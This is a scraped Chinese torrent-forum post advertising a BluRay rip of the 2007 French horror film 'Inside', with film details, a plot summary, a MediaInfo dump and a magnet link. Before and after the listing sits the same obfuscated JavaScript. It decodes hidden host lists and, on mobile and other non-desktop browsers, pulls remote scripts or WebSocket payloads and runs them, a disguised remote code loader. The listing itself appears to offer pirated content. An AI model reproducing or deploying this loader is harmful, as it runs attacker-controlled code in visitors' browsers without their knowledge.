身在其中[简繁字幕].Inside.2007.BluRay.1080p.DTS-HD.MA.2.0.x265.10bit 7.54GB

版主小s 1月前 206

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 身在其中 / 鲜胎活剥(台) / 夜半女敲门 / 夺婴 / Inside

◎片 名 à l'intérieur

◎年 代 2007

◎产 地 法国

◎类 别 惊悚 / 恐怖

◎语 言 法语

◎上映日期 2007-06-13

◎IMDb链接 https://www.imdb.com/title/tt0856288/

◎豆瓣评分 6.5/10 (7830人评价)

◎豆瓣链接 https://movie.douban.com/subject/1963710/

◎片 长 83分钟

◎导 演 亚历山大·布斯蒂罗 Alexandre Bustillo (id:1310834)

朱利安·莫利 Julien Maury (id:1310839)

◎编 剧 朱利安·莫利 Julien Maury (id:1310839)

亚历山大·布斯蒂罗 Alexandre Bustillo (id:1310834)

◎演 员 艾莉森·帕拉迪丝 Alysson Paradis (id:1321946)

Jean-Baptiste Tabourin Jean-Baptiste Tabourin (id:1324130)

娜莎丽·罗赛 Nathalie Roussel (id:1050921)

碧翠斯·黛尔 Béatrice Dalle (id:1036725)

塔哈·拉希姆 Tahar Rahim (id:1009428)

卢德维克·伯特希尔克 Ludovic Berthillot (id:1064558)

尼古拉斯·迪佛休尔 Nicolas Duvauchelle (id:1000567)

Aymen Sa?di Aymen Sa?di (id:1296795)

Emmanuel Lanzi Emmanuel Lanzi (id:1441525)

Fran?ois Eudes Fran?ois Eudes (id:1038802)

Pierre Olivier Persin Pierre Olivier Persin (id:1210179)

◎标 签 血腥 / 恐怖 / 法国 / 惊悚 / 暴力 / 法国电影 / 2007 / 诡异

◎简 介

女性摄影师莎拉(Alysson Paradis 饰)和马西欧(Jean-Baptiste Tabourin 饰)这对幸福的夫妻组成的小家庭即将迎来新的成员,但一场严重的车祸摧毁了他们美好的憧憬。马西欧在车祸中丧生,莎拉以及未出世的宝宝侥幸存活。

圣诞之夜,孤独的莎拉待在家中,等待第二天早晨的生产。这时敲门声响起,一名黑衣女(Béatrice Dalle 饰)请求使用电话。莎拉本能地拒绝了她,谁知黑衣女竟千方百计想要闯进来。她的目的只有一个,抢夺莎拉那尚未出世的孩子。挡路者只有死路一条……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 170453747122243739073949561162914425239 (0x803C32940CF8744FEBABD6B646696997)

  4. Complete name : [email protected]OM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.54 GiB

  8. Duration : 1 h 22 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 13.1 Mb/s

  11. Encoded date : UTC 2021-10-26 07:07:20

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 22 min

  21. Bit rate : 11.0 Mb/s

  22. Width : 1 920 pixels

  23. Height : 1 020 pixels

  24. Display aspect ratio : 1.882

  25. Frame rate mode : Constant

  26. Frame rate : 24.000 FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.234

  31. Stream size : 6.31 GiB (84%)

  32. Title : HEVC, [email protected]@High, 24 fps @ 11073 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1020 / interlace=0 / total-frames=118200 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio

  43. ID : 2

  44. Format : DTS XLL

  45. Format/Info : Digital Theater Systems

  46. Commercial name : DTS-HD Master Audio

  47. Codec ID : A_DTS

  48. Duration : 1 h 22 min

  49. Bit rate mode : Variable

  50. Bit rate : 2 122 kb/s

  51. Channel(s) : 2 channels

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossless

  56. Stream size : 1.22 GiB (16%)

  57. Title : French DTS-HD Master Audio 2.0 @ 2122 kbps

  58. Language : French

  59. Default : Yes

  60. Forced : No


  61. Text #1

  62. ID : 3

  63. Format : PGS

  64. Codec ID : S_HDMV/PGS

  65. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration : 1 h 15 min

  67. Bit rate : 9 463 b/s

  68. Count of elements : 880

  69. Stream size : 5.14 MiB (0%)

  70. Title : Chs/SUP 简体

  71. Language : Chinese

  72. Default : Yes

  73. Forced : No


  74. Text #2

  75. ID : 4

  76. Format : PGS

  77. Codec ID : S_HDMV/PGS

  78. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration : 1 h 15 min

  80. Bit rate : 9 847 b/s

  81. Count of elements : 880

  82. Stream size : 5.35 MiB (0%)

  83. Title : Cht/SUP 繁体

  84. Language : Chinese

  85. Default : No

  86. Forced : No


  87. Menu

  88. 00:00:00.000 : en:第 01 章

  89. 00:08:00.542 : en:第 02 章

  90. 00:16:12.250 : en:第 03 章

  91. 00:23:28.833 : en:第 04 章

  92. 00:30:28.625 : en:第 05 章

  93. 00:37:38.000 : en:第 06 章

  94. 00:44:44.792 : en:第 07 章

  95. 00:52:27.667 : en:第 08 章

  96. 00:58:58.792 : en:第 09 章

  97. 01:05:42.292 : en:第 10 章

  98. 01:11:33.458 : en:第 11 章

  99. 01:18:19.625 : en:第 12 章




复制代码


TAGS 惊悚 恐怖

磁力链:
  • magnet:?xt=urn:btih:6198AB490383DD4B76EE973488AE0345478C6192

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};